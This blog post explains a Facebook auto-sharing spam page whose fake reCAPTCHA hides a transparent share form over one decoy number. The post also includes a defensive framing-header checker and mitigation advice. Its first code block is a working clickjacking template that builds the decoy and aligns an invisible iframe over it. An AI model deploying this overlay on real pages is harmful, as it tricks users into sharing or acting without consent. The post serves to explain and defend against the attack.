Random Notes

Facebook Auto-Sharing Spam Pages

Whatever you think of Internet scammers, they sure are inventive. They keep figuring out new ways to scam people for clicks, money, or whatever else it is they want. Today I noticed a new type of auto-sharing spam page that was unwittingly shared by a Facebook friend of mine. It takes the form of a regular-looking clickbait page that lures you in with its title, but once you are on the page, it tricks you into sharing it on your own timeline.

A fake reCAPTCHA that may look convincing at a quick glance.

The picture above shows what looks like a typical “funny/incredible links” site that opens a reCAPTCHA dialog to check that you are a human and not a robot. A reasonable request, right? It should be immediately suspicious, though, that this CAPTCHA opens as soon as the site loads and is not tied to any user input. The dialog also looks slightly too unprofessional to be real: there are no spaces in the list of numbers and no period after the sentence.

What happens is that the user is lured into clicking through the fake reCAPTCHA to get to the content. The first two and the last two numbers do nothing when clicked, except show a nice green checkmark as thanks for the user’s unfailing co-operation. The third number, however, sits under an <iframe> that renders an invisible Facebook Connect share form. A click on that number actually lands on the form, which shares the page on the user’s timeline without a confirmation prompt or any other indication that they have now shared the page. This is classic clickjacking: the user sees and clicks a decoy, but the click is delivered to an invisible page framed on top of it.

The invisible Facebook Connect form that is positioned on top of the third number of the reCAPTCHA.
The end result on a victim's timeline.
If you are using incognito mode or are not logged in to Facebook, clicking the third number will open the Facebook login page in a popup.
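To make the layout concrete, here is an added example of how a page like the one described above is put together. This is illustrative code written for this post, not code taken from the spam page or from Facebook. The share URL (`SHARE_URL`), the framed page's size and the position of its share button (`BUTTON_OFFSET`, `FRAME_SIZE`) are placeholders; the framed target has to be a page that allows itself to be embedded, which is exactly what the Facebook Connect form did here.

```javascript
// Added example, not code from the original post or the spam page it describes:
// a minimal version of the fake-reCAPTCHA layout. A row of five decoy numbers is
// drawn; the third one is covered by a fully transparent <iframe> showing a share
// form, so a click meant for "3" is delivered to the share button instead.
// SHARE_URL, BUTTON_OFFSET and FRAME_SIZE are placeholders (assumed): the framed
// page must permit framing and its share button must sit at that offset.

// Geometry of the overlay. The iframe is put inside a clipping <div> that has
// exactly the decoy's box, so only clicks on the decoy reach the framed page;
// inside the clip, the iframe is shifted so that the button inside the framed
// page lands exactly under the decoy. All numbers are CSS pixels.
function alignFrame(decoyRect, buttonOffset, frameSize) {
  return {
    clip: { left: decoyRect.left, top: decoyRect.top,
            width: decoyRect.width, height: decoyRect.height },
    frame: { left: -buttonOffset.x, top: -buttonOffset.y,
             width: frameSize.width, height: frameSize.height },
  };
}

// Turn a geometry object into a CSS declaration string.
function toCss(rect) {
  return `left:${rect.left}px;top:${rect.top}px;width:${rect.width}px;height:${rect.height}px`;
}

const CELL = 40, GAP = 10;  // size and spacing of the decoy number boxes

// Build the decoy into a live DOM document (browser only). targetIndex selects
// which number gets the invisible frame; 2 is the third number, as in the post.
function buildDecoy(doc, shareUrl, buttonOffset, frameSize, targetIndex = 2) {
  const box = doc.createElement('div');
  box.style.cssText = 'width:300px;padding:10px;border:1px solid #ccc;font:14px sans-serif';
  box.textContent = 'Click the numbers in order to prove you are human';
  const row = doc.createElement('div');
  row.style.cssText = `position:relative;height:${CELL}px;margin-top:8px`;
  box.appendChild(row);

  [1, 2, 3, 4, 5].forEach((n, i) => {
    const cell = doc.createElement('span');
    cell.textContent = String(n);
    cell.style.cssText = `position:absolute;top:0;left:${i * (CELL + GAP)}px;` +
      `width:${CELL}px;height:${CELL}px;line-height:${CELL}px;text-align:center;` +
      'border:1px solid #888;cursor:pointer';
    // The harmless numbers just turn into a green checkmark, as the post describes.
    cell.addEventListener('click', () => { cell.textContent = '\u2713'; cell.style.color = 'green'; });
    row.appendChild(cell);
  });

  // Cover the target number with the clipped, transparent frame.
  const decoyRect = { left: targetIndex * (CELL + GAP), top: 0, width: CELL, height: CELL };
  const geom = alignFrame(decoyRect, buttonOffset, frameSize);
  const clip = doc.createElement('div');
  clip.style.cssText = `position:absolute;overflow:hidden;z-index:10;${toCss(geom.clip)}`;
  const frame = doc.createElement('iframe');
  frame.src = shareUrl;
  // opacity:0 is what hides the form; set it to 0.5 while debugging to see the
  // overlay, which is roughly what the screenshot above shows.
  frame.style.cssText = `position:absolute;border:0;opacity:0;${toCss(geom.frame)}`;
  clip.appendChild(frame);
  row.appendChild(clip);
  doc.body.appendChild(box);
  return box;
}

// Placeholder target (assumed): a share page that allows framing, 300x200 px,
// with its share button 20 px from the left and 10 px from the top.
const SHARE_URL = 'https://share.example/?u=https://spam.example/';
const BUTTON_OFFSET = { x: 20, y: 10 };
const FRAME_SIZE = { width: 300, height: 200 };

if (typeof document !== 'undefined') {
  buildDecoy(document, SHARE_URL, BUTTON_OFFSET, FRAME_SIZE);
}
```

The clipping container is the detail that keeps the trick tidy: without it, the transparent frame would also swallow clicks on the neighbouring numbers and the checkmark animation would stop working there, which is exactly the kind of glitch that makes a user suspicious. Turning the opacity up while looking at such a page is the quickest way to confirm what a click is really going to hit.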

The page and the fake reCAPTCHA can be quite convincing to a regular user, who may be completely unaware that they have shared the page. This is made worse by the fact that Facebook apparently does not ask for any confirmation when sharing pages from external sources. It could be easily avoided by opening a popup asking whether the user really wishes to share the page on their timeline, or by having the user confirm the share inside Facebook itself. But I guess that is not in Facebook’s best interests, since it creates more active timelines, even if the content itself is useless. A confirmation step only helps, though, if the confirmation itself cannot be clickjacked in the same way; the standard defence is for the share form to refuse to be embedded in other sites at all, which a site can declare with the X-Frame-Options header or the frame-ancestors directive of Content-Security-Policy.
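Whether a page permits framing can be read straight from its response headers, so here is an added check for that, written for this post rather than taken from any product. It implements the precedence browsers apply (a CSP frame-ancestors directive overrides X-Frame-Options, and an unrecognised X-Frame-Options value is ignored, i.e. framing is allowed) with simplified source matching: 'self', 'none', '*', a scheme such as https:, or an exact origin. The header sets at the bottom are constructed for illustration and are not captured from Facebook; the one without any framing header is the situation the spam page relied on.

```javascript
// Added example, not from the original post: decide from response headers whether
// `embedderOrigin` may frame a page served from `pageOrigin`. Returns 'allowed'
// or 'blocked'. Source matching is simplified (no host wildcards, no paths).
function framingPolicy(headers, pageOrigin, embedderOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  const page = pageOrigin.toLowerCase();
  const embedder = embedderOrigin.toLowerCase();

  // 1. A CSP frame-ancestors directive takes precedence over X-Frame-Options.
  const csp = h['content-security-policy'] || '';
  const directive = csp.split(';').map(s => s.trim())
    .find(s => /^frame-ancestors(\s|$)/i.test(s));
  if (directive) {
    const sources = directive.split(/\s+/).slice(1)
      .map(s => s.replace(/^'(.*)'$/, '$1').toLowerCase());
    // An empty source list or 'none' matches nothing.
    if (sources.length === 0 || sources.includes('none')) return 'blocked';
    if (sources.includes('*')) return 'allowed';
    const scheme = embedder.split(':')[0] + ':';
    const ok = sources.some(src =>
      (src === 'self' && embedder === page) || src === embedder || src === scheme);
    return ok ? 'allowed' : 'blocked';
  }

  // 2. Fall back to X-Frame-Options. Browsers ignore values they do not
  //    recognise (including the obsolete ALLOW-FROM), so those allow framing.
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return 'blocked';
  if (xfo === 'SAMEORIGIN') return embedder === page ? 'allowed' : 'blocked';
  return 'allowed';
}

// Constructed sample header sets (not captured from any real site).
const SOCIAL = 'https://social.example';   // where the share form lives (assumed)
const SPAM = 'https://spam.example';       // the page that frames it (assumed)

const NO_PROTECTION = { 'Content-Type': 'text/html' };
const XFO_DENY = { 'X-Frame-Options': 'DENY' };
const XFO_SAMEORIGIN = { 'X-Frame-Options': 'sameorigin' };
const CSP_LIST = {
  'X-Frame-Options': 'DENY',   // overridden by the CSP directive below
  'Content-Security-Policy': "default-src 'self'; frame-ancestors 'self' https://trusted.example",
};

// Summarise the cases; returns the results so they can be checked.
function summary() {
  return {
    none: framingPolicy(NO_PROTECTION, SOCIAL, SPAM),        // 'allowed'
    deny: framingPolicy(XFO_DENY, SOCIAL, SPAM),             // 'blocked'
    sameSelf: framingPolicy(XFO_SAMEORIGIN, SOCIAL, SOCIAL), // 'allowed'
    sameOther: framingPolicy(XFO_SAMEORIGIN, SOCIAL, SPAM),  // 'blocked'
    cspTrusted: framingPolicy(CSP_LIST, SOCIAL, 'https://trusted.example'), // 'allowed'
    cspSpam: framingPolicy(CSP_LIST, SOCIAL, SPAM),          // 'blocked'
  };
}

for (const [name, verdict] of Object.entries(summary())) {
  console.log(`${name}: framing ${verdict}`);
}
```

To run this against a live page in a browser or Node, fetch it and pass `Object.fromEntries(response.headers)` as the `headers` argument; a share or "like" endpoint that comes back `allowed` for an arbitrary embedder is one that a page like the one above can overlay.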

To avoid this happening to you, I suggest using a privacy extension such as Ghostery, which blocks the Facebook Connect form from loading on a page unless you specifically allow it. Besides making browsing safer, it also makes it faster, since you no longer load unnecessary tracking code on every site you visit. Keep in mind that this is a mitigation on the visitor’s side: it only blocks frames from domains the extension knows about, and it does nothing for people who do not run it, which is why the fix really belongs with the site that serves the share form.